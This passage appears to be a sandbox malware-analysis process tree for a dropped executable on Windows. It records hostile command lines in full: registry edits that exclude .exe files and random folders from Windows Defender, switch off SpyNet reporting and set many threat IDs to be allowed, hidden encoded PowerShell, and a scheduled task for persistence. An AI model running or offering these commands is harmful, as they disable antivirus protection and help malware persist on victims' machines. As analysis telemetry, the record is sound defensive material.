                                                              C:\Windows\explorer.exe
                                                              2⤵
                                                                PID:2532
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                              1⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:1268
                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                2⤵
                                                                  PID:592
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                  2⤵
                                                                    PID:4612
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                  1⤵
                                                                    PID:4912
                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                    1⤵
                                                                      PID:2716
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                      1⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3820
                                                                      • C:\Windows\system32\gpupdate.exe
                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                        2⤵
                                                                          PID:2700
                                                                      • C:\Program Files\Google\Chrome\updater.exe
                                                                        "C:\Program Files\Google\Chrome\updater.exe"
                                                                        1⤵
                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                        • Drops file in Drivers directory
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4372
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                        1⤵
                                                                          PID:2796
                                                                        • \??\c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                          1⤵
                                                                            PID:4452
                                                                          • \??\c:\windows\system32\gpscript.exe
                                                                            gpscript.exe /RefreshSystemParam
                                                                            1⤵
                                                                            • Drops file in Windows directory
                                                                            PID:320
                                                                          • C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exe 3Y /WZsite_idDtn 385118 /S
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in System32 directory
                                                                            PID:4576
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                              2⤵
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4868
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:1748
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                    4⤵
                                                                                      PID:412
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:4596
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:1408
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:4116
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:2208
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:1288
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:2716
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:3312
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3164
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:1028
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:3492
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:2208
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:4984
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:2280
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:4860
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:384
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3396
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:4552
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:428
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:2280
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:228
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:4240
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:2612
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:4472
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:4236
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:4592
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:3704
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:3312
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                        2⤵
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:596
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:4288
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              4⤵
                                                                                                                                                PID:3020
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              3⤵
                                                                                                                                                PID:4968
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:4624
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:220
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4076
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4540
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3876
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2868
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1480
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4664
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2612
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4596
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3504
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4700
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2848
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:1576
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4004
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2532
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /CREATE /TN "gJMBcvCaW" /SC once /ST 18:27:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:3308
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /run /I /tn "gJMBcvCaW"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4056
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1748
